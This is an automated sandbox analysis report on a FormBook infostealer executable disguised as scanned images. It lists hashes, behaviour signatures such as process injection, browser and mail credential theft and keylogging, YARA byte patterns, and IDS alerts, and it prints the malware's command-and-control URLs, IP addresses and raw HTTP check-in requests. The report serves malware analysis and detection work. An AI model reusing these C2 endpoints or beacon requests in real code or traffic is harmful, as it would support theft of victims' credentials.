
Windows Analysis Report
Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe

Overview

General Information

Sample name: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
Analysis ID: 1494558
MD5: 58077f7b69ca6e33ec9a13f1b2b53c02
SHA1: 09c02cdd3a29100c0398c4a2192bfbfef34fb94c
SHA256: 758ad60c19d53019939eeb1ac2502931f5f6c17ae9184372f8f30efac42f90c1
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe (PID: 6568 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe" MD5: 58077F7B69CA6E33EC9A13F1B2B53C02)
    • svchost.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XraVxjqYYo.exe (PID: 4756 cmdline: "C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 1944 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • XraVxjqYYo.exe (PID: 1808 cmdline: "C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3152 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a790:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.2120000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.2120000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.2120000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.2120000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2cff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16662:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ParentProcessId: 6568, ParentProcessName: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ProcessId: 5740, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ParentProcessId: 6568, ParentProcessName: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ProcessId: 5740, ProcessName: svchost.exe

AV Detection

Source: http://www.a9jcpf.top/mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8; Avira URL Cloud: Label: malware
Source: http://www.rtrpodcast.online/l2ei/; Avira URL Cloud: Label: malware
Source: http://www.a9jcpf.top/mpex/; Avira URL Cloud: Label: malware
Source: http://www.tqfabxah.com/zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8; Avira URL Cloud: Label: malware
Source: http://www.tqfabxah.com/zjwj/; Avira URL Cloud: Label: malware
Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; ReversingLabs: Detection: 76%
Source: Yara match; File source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Joe Sandbox ML: detected
Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XraVxjqYYo.exe, 00000008.00000000.1545991574.000000000046E000.00000002.00000001.01000000.00000005.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3798030876.000000000046E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A84696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00A84696
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A8C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00A8C9C7
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A8C93C FindFirstFileW,FindClose, 0_2_00A8C93C
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A8F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00A8F200
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A8F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00A8F35D
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A8F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00A8F65E
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A83A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00A83A2B
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A83D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00A83D4E
Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe; Code function: 0_2_00A8BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00A8BF27
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 9_2_026CBAB0 FindFirstFileW,FindNextFileW,FindClose, 9_2_026CBAB0
Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then xor esi, esi; 2_2_021382BA
Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe; Code function: 4x nop then xor esi, esi; 8_2_03231627
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then xor eax, eax; 9_2_026B9720
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then xor esi, esi; 9_2_026C4C57
Source: C:\Windows\SysWOW64\schtasks.exe; Code function: 4x nop then mov ebx, 00000004h; 9_2_02CB0548

Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54134 -> 64.226.69.42:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54152 -> 116.213.43.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54115 -> 217.116.0.191:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54155 -> 116.213.43.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54151 -> 116.213.43.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54145 -> 35.241.42.217:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54112 -> 38.12.1.29:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54132 -> 64.226.69.42:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54127 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54116 -> 217.116.0.191:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54121 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54123 -> 109.95.158.127:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54124 -> 109.95.158.127:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54122 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54125 -> 109.95.158.127:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54144 -> 35.241.42.217:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54153 -> 116.213.43.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54117 -> 217.116.0.191:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54120 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54113 -> 38.12.1.29:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54110 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54128 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54147 -> 76.223.67.189:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54143 -> 35.241.42.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54139 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54130 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54118 -> 217.116.0.191:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54126 -> 109.95.158.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54129 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54148 -> 76.223.67.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54141 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54154 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54131 -> 64.226.69.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54111 -> 38.12.1.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54149 -> 76.223.67.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54135 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54114 -> 38.12.1.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54136 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54156 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54133 -> 64.226.69.42:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54138 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54119 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54140 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54137 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54150 -> 76.223.67.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54146 -> 35.241.42.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54157 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54142 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54158 -> 116.213.43.190:80
            Source: Joe Sandbox ViewIP Address: 217.116.0.191
            Source: Joe Sandbox ViewIP Address: 76.223.67.189
            Source: Joe Sandbox ViewASN Name: ACENS_ASSpainHostinghousingandVPNservicesES
            Source: Joe Sandbox ViewASN Name: AMAZON-02US
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A925E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00A925E2
            Source: global trafficHTTP traffic detected: GET /toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.stemfiniti.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.zhuan-tou.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.lecoinsa.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
